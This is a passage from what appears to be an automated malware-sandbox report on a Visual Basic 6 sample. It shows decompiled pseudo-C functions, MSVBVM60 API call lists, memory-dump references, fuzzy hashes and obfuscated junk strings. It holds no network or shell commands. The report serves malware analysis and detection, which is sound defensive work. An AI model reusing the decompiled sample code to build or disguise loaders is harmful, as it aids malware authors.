                            • __vbaStrToAnsi.MSVBVM60(?,004012A6,00000400,00000400,00000002), ref: 0040BD49
                            • __vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BD5E
                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BD72
                            • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BD7D
                            • __vbaStrToUnicode.MSVBVM60(004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BD89
                            • __vbaFreeStrList.MSVBVM60(00000002,00000000,?,004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6), ref: 0040BDA1
                            • __vbaStrCopy.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?), ref: 0040C088
                            • __vbaSetSystemError.MSVBVM60(?), ref: 0040C0A0
                            • __vbaFreeStr.MSVBVM60(0040C0F2,?), ref: 0040C0EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
                            • String ID: Lindormen
                            • API String ID: 3225542645-1899767452
                            • Opcode ID: 997cb1f8397c93b76dc0b7aee79f75a094fccadcac2ffcafdb66425d3ff80bc7
                            • Instruction ID: 5146e94e2ae992a1978226fbbd6ce686bda84066dcbecf7e4ec90b883c1d4aaa
                            • Opcode Fuzzy Hash: 997cb1f8397c93b76dc0b7aee79f75a094fccadcac2ffcafdb66425d3ff80bc7
                            • Instruction Fuzzy Hash: FDE1C871D00219ABDB10EFE1C845FDEB7B8AF04308F10856AF515B71A2DB789A45CF69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E0040E722(void* __ebx, void* __edi, void* __esi, char* _a4, void* _a8, void* _a24, void* _a52) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				void* _v40;
                            				void* _v56;
                            				intOrPtr _v60;
                            				void* _v76;
                            				char _v88;
                            				char _v104;
                            				char* _v128;
                            				char _v136;
                            				char* _v160;
                            				intOrPtr _v168;
                            				intOrPtr _v192;
                            				intOrPtr _v200;
                            				char _v220;
                            				void* _v224;
                            				signed int _v228;
                            				intOrPtr* _v240;
                            				signed int _v244;
                            				short _t63;
                            				short _t64;
                            				char* _t69;
                            				signed int _t73;
                            				void* _t101;
                            				void* _t103;
                            				intOrPtr _t104;
                            
                            				_t104 = _t103 - 0xc;
                            				 *[fs:0x0] = _t104;
                            				L004012A0();
                            				_v16 = _t104;
                            				_v12 = 0x401220;
                            				_v8 = 0;
                            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t101);
                            				L004013E4();
                            				L004013E4();
                            				L004013E4();
                            				_push( &_v104);
                            				L00401372();
                            				_v128 = L"supraspinate";
                            				_v136 = 0x8008;
                            				_push( &_v104);
                            				_t63 =  &_v136;
                            				_push(_t63);
                            				L00401378();
                            				_v224 = _t63;
                            				L00401450();
                            				_t64 = _v224;
                            				if(_t64 != 0) {
                            					_v128 = _a4;
                            					_v136 = 9;
                            					_v160 = L"dreas";
                            					_v168 = 8;
                            					if( *0x410010 != 0) {
                            						_v240 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v240 = 0x410010;
                            					}
                            					_t69 =  &_v88;
                            					L004013CC();
                            					_v224 = _t69;
                            					_t73 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v220, _t69,  *((intOrPtr*)( *((intOrPtr*)( *_v240)) + 0x318))( *_v240));
                            					asm("fclex");
                            					_v228 = _t73;
                            					if(_v228 >= 0) {
                            						_v244 = _v244 & 0x00000000;
                            					} else {
                            						_push(0x60);
                            						_push(0x40b278);
                            						_push(_v224);
                            						_push(_v228);
                            						L004013D8();
                            						_v244 = _t73;
                            					}
                            					_v192 = _v220;
                            					_v200 = 3;
                            					_push(0x10);
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					_push(0x10);
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					_t64 = 0x10;
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					_push(3);
                            					_push(L"JmVo9kBNN3193");
                            					_push(_v60);
                            					L0040136C();
                            					L004013D2();
                            				}
                            				asm("wait");
                            				_push(E0040E948);
                            				L00401450();
                            				L00401450();
                            				L004013D2();
                            				L00401450();
                            				return _t64;
                            			}






























                            0x0040e725
                            0x0040e734
                            0x0040e740
                            0x0040e748
                            0x0040e74b
                            0x0040e752
                            0x0040e761
                            0x0040e76a
                            0x0040e775
                            0x0040e780
                            0x0040e788
                            0x0040e789
                            0x0040e78e
                            0x0040e795
                            0x0040e7a2
                            0x0040e7a3
                            0x0040e7a9
                            0x0040e7aa
                            0x0040e7af
                            0x0040e7b9
                            0x0040e7be
                            0x0040e7c7
                            0x0040e7d0
                            0x0040e7d3
                            0x0040e7dd
                            0x0040e7e7
                            0x0040e7f8
                            0x0040e815
                            0x0040e7fa
                            0x0040e7fa
                            0x0040e7ff
                            0x0040e804
                            0x0040e809
                            0x0040e809
                            0x0040e839
                            0x0040e83d
                            0x0040e842
                            0x0040e85d
                            0x0040e860
                            0x0040e862
                            0x0040e86f
                            0x0040e891
                            0x0040e871
                            0x0040e871
                            0x0040e873
                            0x0040e878
                            0x0040e87e
                            0x0040e884
                            0x0040e889
                            0x0040e889
                            0x0040e89e
                            0x0040e8a4
                            0x0040e8ae
                            0x0040e8b1
                            0x0040e8be
                            0x0040e8bf
                            0x0040e8c0
                            0x0040e8c1
                            0x0040e8c2
                            0x0040e8c5
                            0x0040e8d2
                            0x0040e8d3
                            0x0040e8d4
                            0x0040e8d5
                            0x0040e8d8
                            0x0040e8d9
                            0x0040e8e6
                            0x0040e8e7
                            0x0040e8e8
                            0x0040e8e9
                            0x0040e8ea
                            0x0040e8ec
                            0x0040e8f1
                            0x0040e8f4
                            0x0040e8ff
                            0x0040e8ff
                            0x0040e904
                            0x0040e905
                            0x0040e92a
                            0x0040e932
                            0x0040e93a
                            0x0040e942
                            0x0040e947

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E740
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E76A
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E775
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E780
                            • #670.MSVBVM60(?,?,?,?,?,004012A6), ref: 0040E789
                            • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E7AA
                            • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E7B9
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,?,?,?,?,00008008,?), ref: 0040E804
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E83D
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000060), ref: 0040E884
                            • __vbaChkstk.MSVBVM60(00000000,?,0040B278,00000060), ref: 0040E8B1
                            • __vbaChkstk.MSVBVM60(00000000,?,0040B278,00000060), ref: 0040E8C5
                            • __vbaChkstk.MSVBVM60(00000000,?,0040B278,00000060), ref: 0040E8D9
                            • __vbaLateMemCall.MSVBVM60(?,JmVo9kBNN3193,00000003), ref: 0040E8F4
                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040E8FF
                            • __vbaFreeVar.MSVBVM60(0040E948,00008008,?), ref: 0040E92A
                            • __vbaFreeVar.MSVBVM60(0040E948,00008008,?), ref: 0040E932
                            • __vbaFreeObj.MSVBVM60(0040E948,00008008,?), ref: 0040E93A
                            • __vbaFreeVar.MSVBVM60(0040E948,00008008,?), ref: 0040E942
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$Chkstk$#670CallCheckHresultLateNew2
                            • String ID: Hr_$JmVo9kBNN3193$dreas$supraspinate
                            • API String ID: 1440615753-2012018432
                            • Opcode ID: 3f643856230c21a2c9656570b97cd214fd6acbba9acd1fd0d86959aa959509ff
                            • Instruction ID: eb7a408152f0c8adb51277c0a54952b8ffd38f7d7b7b94b14be290041cea905f
                            • Opcode Fuzzy Hash: 3f643856230c21a2c9656570b97cd214fd6acbba9acd1fd0d86959aa959509ff
                            • Instruction Fuzzy Hash: C4512A71900219DFDB20EF91C845BDDB7B5BF08304F5084AAF909BB2A1DBB95A85CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E0040EA4E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v28;
                            				char _v32;
                            				signed int _v36;
                            				char _v40;
                            				intOrPtr _v48;
                            				char _v56;
                            				intOrPtr _v80;
                            				intOrPtr _v88;
                            				char _v108;
                            				void* _v112;
                            				signed int _v116;
                            				intOrPtr* _v120;
                            				signed int _v124;
                            				signed int _v136;
                            				intOrPtr* _v140;
                            				signed int _v144;
                            				intOrPtr* _v148;
                            				signed int _v152;
                            				char* _t73;
                            				char* _t74;
                            				char* _t78;
                            				signed int _t82;
                            				char* _t88;
                            				signed int _t92;
                            				void* _t116;
                            				void* _t118;
                            				intOrPtr _t119;
                            
                            				_t119 = _t118 - 0xc;
                            				 *[fs:0x0] = _t119;
                            				L004012A0();
                            				_v16 = _t119;
                            				_v12 = E00401240;
                            				_v8 = 0;
                            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
                            				_push(0xb);
                            				_push(0xb);
                            				_push(0x7db);
                            				_push( &_v56);
                            				L00401354();
                            				_t73 =  &_v56;
                            				_push(_t73);
                            				L0040135A();
                            				_v112 =  ~(0 | _t73 != 0x0000ffff);
                            				L00401450();
                            				_t74 = _v112;
                            				if(_t74 != 0) {
                            					if( *0x410010 != 0) {
                            						_v140 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v140 = 0x410010;
                            					}
                            					_t78 =  &_v32;
                            					L004013CC();
                            					_v112 = _t78;
                            					_t82 =  *((intOrPtr*)( *_v112 + 0x120))(_v112,  &_v36, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
                            					asm("fclex");
                            					_v116 = _t82;
                            					if(_v116 >= 0) {
                            						_v144 = _v144 & 0x00000000;
                            					} else {
                            						_push(0x120);
                            						_push(0x40b278);
                            						_push(_v112);
                            						_push(_v116);
                            						L004013D8();
                            						_v144 = _t82;
                            					}
                            					_v136 = _v36;
                            					_v36 = _v36 & 0x00000000;
                            					_v48 = _v136;
                            					_v56 = 9;
                            					if( *0x410010 != 0) {
                            						_v148 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v148 = 0x410010;
                            					}
                            					_t88 =  &_v40;
                            					L004013CC();
                            					_v120 = _t88;
                            					_t92 =  *((intOrPtr*)( *_v120 + 0x60))(_v120,  &_v108, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x300))( *_v148));
                            					asm("fclex");
                            					_v124 = _t92;
                            					if(_v124 >= 0) {
                            						_v152 = _v152 & 0x00000000;
                            					} else {
                            						_push(0x60);
                            						_push(0x40b268);
                            						_push(_v120);
                            						_push(_v124);
                            						L004013D8();
                            						_v152 = _t92;
                            					}
                            					_v80 = _v108;
                            					_v88 = 3;
                            					_push(0x10);
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					_push(0x10);
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					_push(2);
                            					_push(L"IpXl81");
                            					_push(_v28);
                            					L0040136C();
                            					_push( &_v40);
                            					_t74 =  &_v32;
                            					_push(_t74);
                            					_push(2);
                            					L004013C6();
                            					L00401450();
                            				}
                            				_push(E0040EC99);
                            				L004013D2();
                            				return _t74;
                            			}

































                            0x0040ea51
                            0x0040ea60
                            0x0040ea6c
                            0x0040ea74
                            0x0040ea77
                            0x0040ea7e
                            0x0040ea8d
                            0x0040ea90
                            0x0040ea92
                            0x0040ea94
                            0x0040ea9c
                            0x0040ea9d
                            0x0040eaa2
                            0x0040eaa5
                            0x0040eaa6
                            0x0040eab6
                            0x0040eabd
                            0x0040eac2
                            0x0040eac8
                            0x0040ead5
                            0x0040eaf2
                            0x0040ead7
                            0x0040ead7
                            0x0040eadc
                            0x0040eae1
                            0x0040eae6
                            0x0040eae6
                            0x0040eb16
                            0x0040eb1a
                            0x0040eb1f
                            0x0040eb2e
                            0x0040eb34
                            0x0040eb36
                            0x0040eb3d
                            0x0040eb5c
                            0x0040eb3f
                            0x0040eb3f
                            0x0040eb44
                            0x0040eb49
                            0x0040eb4c
                            0x0040eb4f
                            0x0040eb54
                            0x0040eb54
                            0x0040eb66
                            0x0040eb6c
                            0x0040eb76
                            0x0040eb79
                            0x0040eb87
                            0x0040eba4
                            0x0040eb89
                            0x0040eb89
                            0x0040eb8e
                            0x0040eb93
                            0x0040eb98
                            0x0040eb98
                            0x0040ebc8
                            0x0040ebcc
                            0x0040ebd1
                            0x0040ebe0
                            0x0040ebe3
                            0x0040ebe5
                            0x0040ebec
                            0x0040ec08
                            0x0040ebee
                            0x0040ebee
                            0x0040ebf0
                            0x0040ebf5
                            0x0040ebf8
                            0x0040ebfb
                            0x0040ec00
                            0x0040ec00
                            0x0040ec12
                            0x0040ec15
                            0x0040ec1c
                            0x0040ec1f
                            0x0040ec29
                            0x0040ec2a
                            0x0040ec2b
                            0x0040ec2c
                            0x0040ec2d
                            0x0040ec30
                            0x0040ec3a
                            0x0040ec3b
                            0x0040ec3c
                            0x0040ec3d
                            0x0040ec3e
                            0x0040ec40
                            0x0040ec45
                            0x0040ec48
                            0x0040ec53
                            0x0040ec54
                            0x0040ec57
                            0x0040ec58
                            0x0040ec5a
                            0x0040ec65
                            0x0040ec65
                            0x0040ec6a
                            0x0040ec93
                            0x0040ec98

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EA6C
                            • #538.MSVBVM60(?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EA9D
                            • #557.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EAA6
                            • __vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EABD
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EAE1
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB1A
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000120), ref: 0040EB4F
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040EB93
                            • __vbaObjSet.MSVBVM60(0000000B,00000000), ref: 0040EBCC
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000060), ref: 0040EBFB
                            • __vbaChkstk.MSVBVM60(00000000,?,0040B268,00000060), ref: 0040EC1F
                            • __vbaChkstk.MSVBVM60(00000000,?,0040B268,00000060), ref: 0040EC30
                            • __vbaLateMemCall.MSVBVM60(?,IpXl81,00000002), ref: 0040EC48
                            • __vbaFreeObjList.MSVBVM60(00000002,?,0000000B), ref: 0040EC5A
                            • __vbaFreeVar.MSVBVM60 ref: 0040EC65
                            • __vbaFreeObj.MSVBVM60(0040EC99,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EC93
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$Chkstk$CheckHresultNew2$#538#557CallLateList
                            • String ID: Hr_$IpXl81
                            • API String ID: 2856081814-3757451831
                            • Opcode ID: 50d72cb9da965eaa191b2bd9d390cdb5d10df5b8b7d5e2029fbb7046ccd76fa5
                            • Instruction ID: c8c8b4cd5a9cfc95b22fa18a6ff7f815bfa578c6cd7b162b3c38ba227641f0f8
                            • Opcode Fuzzy Hash: 50d72cb9da965eaa191b2bd9d390cdb5d10df5b8b7d5e2029fbb7046ccd76fa5
                            • Instruction Fuzzy Hash: C4513B71E00208DFDB10DFA5C846BDDBBB8BF08704F1044AAF505BB2A1D7B969959F58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 57%
                            			E0040EE26(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				void* _v32;
                            				signed int _v36;
                            				char _v40;
                            				long long _v48;
                            				char _v56;
                            				intOrPtr _v64;
                            				char _v72;
                            				intOrPtr _v80;
                            				char _v88;
                            				intOrPtr _v96;
                            				char _v104;
                            				intOrPtr _v112;
                            				char _v120;
                            				intOrPtr _v128;
                            				char _v136;
                            				intOrPtr _v144;
                            				char _v152;
                            				void* _v252;
                            				signed int _v256;
                            				signed int _v268;
                            				intOrPtr* _v272;
                            				signed int _v276;
                            				signed int _t74;
                            				char* _t78;
                            				char* _t82;
                            				signed int _t86;
                            				void* _t116;
                            				void* _t118;
                            				intOrPtr _t119;
                            
                            				_t119 = _t118 - 0xc;
                            				 *[fs:0x0] = _t119;
                            				L004012A0();
                            				_v16 = _t119;
                            				_v12 = 0x401268;
                            				_v8 = 0;
                            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
                            				_v48 =  *0x401260;
                            				_v56 = 5;
                            				_t74 =  &_v56;
                            				_push(_t74);
                            				L00401348();
                            				L0040145C();
                            				_push(_t74);
                            				_push(L"Double");
                            				L00401360();
                            				asm("sbb eax, eax");
                            				_v252 =  ~( ~( ~_t74));
                            				L00401462();
                            				L00401450();
                            				_t78 = _v252;
                            				if(_t78 != 0) {
                            					_v144 = 0x80020004;
                            					_v152 = 0xa;
                            					_v128 = 0x80020004;
                            					_v136 = 0xa;
                            					_v112 = 0x80020004;
                            					_v120 = 0xa;
                            					_v96 = 0x80020004;
                            					_v104 = 0xa;
                            					_v80 = 0x80020004;
                            					_v88 = 0xa;
                            					_v64 = 0x80020004;
                            					_v72 = 0xa;
                            					if( *0x410010 != 0) {
                            						_v272 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v272 = 0x410010;
                            					}
                            					_t82 =  &_v40;
                            					L004013CC();
                            					_v252 = _t82;
                            					_t86 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x2fc))( *_v272));
                            					asm("fclex");
                            					_v256 = _t86;
                            					if(_v256 >= 0) {
                            						_v276 = _v276 & 0x00000000;
                            					} else {
                            						_push(0x50);
                            						_push(0x40b268);
                            						_push(_v252);
                            						_push(_v256);
                            						L004013D8();
                            						_v276 = _t86;
                            					}
                            					_v268 = _v36;
                            					_v36 = _v36 & 0x00000000;
                            					_v48 = _v268;
                            					_v56 = 8;
                            					_push( &_v152);
                            					_push( &_v136);
                            					_push( &_v120);
                            					_push( &_v104);
                            					_push( &_v88);
                            					_push( &_v72);
                            					_push( &_v56);
                            					L00401342();
                            					L0040145C();
                            					L004013D2();
                            					_push( &_v152);
                            					_push( &_v136);
                            					_push( &_v120);
                            					_push( &_v104);
                            					_push( &_v88);
                            					_push( &_v72);
                            					_t78 =  &_v56;
                            					_push(_t78);
                            					_push(7);
                            					L00401432();
                            				}
                            				asm("wait");
                            				_push(E0040F095);
                            				L00401462();
                            				return _t78;
                            			}



































                            0x0040ee29
                            0x0040ee38
                            0x0040ee44
                            0x0040ee4c
                            0x0040ee4f
                            0x0040ee56
                            0x0040ee65
                            0x0040ee6e
                            0x0040ee71
                            0x0040ee78
                            0x0040ee7b
                            0x0040ee7c
                            0x0040ee86
                            0x0040ee8b
                            0x0040ee8c
                            0x0040ee91
                            0x0040ee98
                            0x0040ee9e
                            0x0040eea8
                            0x0040eeb0
                            0x0040eeb5
                            0x0040eebe
                            0x0040eec4
                            0x0040eece
                            0x0040eed8
                            0x0040eedf
                            0x0040eee9
                            0x0040eef0
                            0x0040eef7
                            0x0040eefe
                            0x0040ef05
                            0x0040ef0c
                            0x0040ef13
                            0x0040ef1a
                            0x0040ef28
                            0x0040ef45
                            0x0040ef2a
                            0x0040ef2a
                            0x0040ef2f
                            0x0040ef34
                            0x0040ef39
                            0x0040ef39
                            0x0040ef69
                            0x0040ef6d
                            0x0040ef72
                            0x0040ef8a
                            0x0040ef8d
                            0x0040ef8f
                            0x0040ef9c
                            0x0040efbe
                            0x0040ef9e
                            0x0040ef9e
                            0x0040efa0
                            0x0040efa5
                            0x0040efab
                            0x0040efb1
                            0x0040efb6
                            0x0040efb6
                            0x0040efc8
                            0x0040efce
                            0x0040efd8
                            0x0040efdb
                            0x0040efe8
                            0x0040efef
                            0x0040eff3
                            0x0040eff7
                            0x0040effb
                            0x0040efff
                            0x0040f003
                            0x0040f004
                            0x0040f00e
                            0x0040f016
                            0x0040f021
                            0x0040f028
                            0x0040f02c
                            0x0040f030
                            0x0040f034
                            0x0040f038
                            0x0040f039
                            0x0040f03c
                            0x0040f03d
                            0x0040f03f
                            0x0040f044
                            0x0040f047
                            0x0040f048
                            0x0040f08f
                            0x0040f094

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EE44
                            • #591.MSVBVM60(00000005), ref: 0040EE7C
                            • __vbaStrMove.MSVBVM60(00000005), ref: 0040EE86
                            • __vbaStrCmp.MSVBVM60(Double,00000000,00000005), ref: 0040EE91
                            • __vbaFreeStr.MSVBVM60(Double,00000000,00000005), ref: 0040EEA8
                            • __vbaFreeVar.MSVBVM60(Double,00000000,00000005), ref: 0040EEB0
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040EF34
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF6D
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000050), ref: 0040EFB1
                            • #596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040F004
                            • __vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040F00E
                            • __vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040F016
                            • __vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040F03F
                            • __vbaFreeStr.MSVBVM60(0040F095,Double,00000000,00000005), ref: 0040F08F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$Move$#591#596CheckChkstkHresultListNew2
                            • String ID: Double$Hr_
                            • API String ID: 3707479433-2524497917
                            • Opcode ID: 6d42fc5c10e49344ed1f4f1c579cdb661d3352508ae81dcbc7c0fb966a57ef56
                            • Instruction ID: 6fe00e441d1b60831e065fa68219d9a6f90adc45e87faf2b6f7e08d0ed758c10
                            • Opcode Fuzzy Hash: 6d42fc5c10e49344ed1f4f1c579cdb661d3352508ae81dcbc7c0fb966a57ef56
                            • Instruction Fuzzy Hash: 145109B194021DEBDB21DF91C945BDEB7B8FB08304F1081BAE105B7191DBB85A89CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E0040E395(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a40, void* _a48) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				char _v24;
                            				void* _v40;
                            				void* _v56;
                            				void* _v60;
                            				char _v76;
                            				char* _v100;
                            				char _v108;
                            				intOrPtr _v116;
                            				char _v124;
                            				signed int _v128;
                            				signed int _v136;
                            				signed int _t42;
                            				signed int _t43;
                            				intOrPtr _t65;
                            
                            				_push(0x4012a6);
                            				_push( *[fs:0x0]);
                            				 *[fs:0x0] = _t65;
                            				_push(0x74);
                            				L004012A0();
                            				_v12 = _t65;
                            				_v8 = 0x4011e8;
                            				L004013E4();
                            				L00401420();
                            				L004013E4();
                            				L00401420();
                            				_v100 =  &_v24;
                            				_v108 = 0x4008;
                            				_push(1);
                            				_push( &_v108);
                            				_push( &_v76);
                            				L0040138A();
                            				_v116 = 0x40b2f0;
                            				_v124 = 0x8008;
                            				_push( &_v76);
                            				_t42 =  &_v124;
                            				_push(_t42);
                            				L004013F0();
                            				_v128 = _t42;
                            				L00401450();
                            				_t43 = _v128;
                            				if(_t43 != 0) {
                            					_t43 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
                            					_v128 = _t43;
                            					if(_v128 >= 0) {
                            						_v136 = _v136 & 0x00000000;
                            					} else {
                            						_push(0x718);
                            						_push(0x40af38);
                            						_push(_a4);
                            						_push(_v128);
                            						L004013D8();
                            						_v136 = _t43;
                            					}
                            				}
                            				_push(E0040E4B1);
                            				L00401462();
                            				L00401450();
                            				L00401450();
                            				L00401462();
                            				return _t43;
                            			}



















                            0x0040e39a
                            0x0040e3a5
                            0x0040e3a6
                            0x0040e3ad
                            0x0040e3b0
                            0x0040e3b8
                            0x0040e3bb
                            0x0040e3c8
                            0x0040e3d3
                            0x0040e3de
                            0x0040e3eb
                            0x0040e3f3
                            0x0040e3f6
                            0x0040e3fd
                            0x0040e402
                            0x0040e406
                            0x0040e407
                            0x0040e40c
                            0x0040e413
                            0x0040e41d
                            0x0040e41e
                            0x0040e421
                            0x0040e422
                            0x0040e427
                            0x0040e42e
                            0x0040e433
                            0x0040e439
                            0x0040e443
                            0x0040e449
                            0x0040e450
                            0x0040e46f
                            0x0040e452
                            0x0040e452
                            0x0040e457
                            0x0040e45c
                            0x0040e45f
                            0x0040e462
                            0x0040e467
                            0x0040e467
                            0x0040e450
                            0x0040e476
                            0x0040e493
                            0x0040e49b
                            0x0040e4a3
                            0x0040e4ab
                            0x0040e4b0

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E3B0
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E3C8
                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E3D3
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E3DE
                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E3EB
                            • #619.MSVBVM60(?,00004008,00000001), ref: 0040E407
                            • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E422
                            • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E42E
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AF38,00000718), ref: 0040E462
                            • __vbaFreeStr.MSVBVM60(0040E4B1,?,?,?,00004008,00000001), ref: 0040E493
                            • __vbaFreeVar.MSVBVM60(0040E4B1,?,?,?,00004008,00000001), ref: 0040E49B
                            • __vbaFreeVar.MSVBVM60(0040E4B1,?,?,?,00004008,00000001), ref: 0040E4A3
                            • __vbaFreeStr.MSVBVM60(0040E4B1,?,?,?,00004008,00000001), ref: 0040E4AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$Copy$#619CheckChkstkHresult
                            • String ID: ABC
                            • API String ID: 4030740960-2743272264
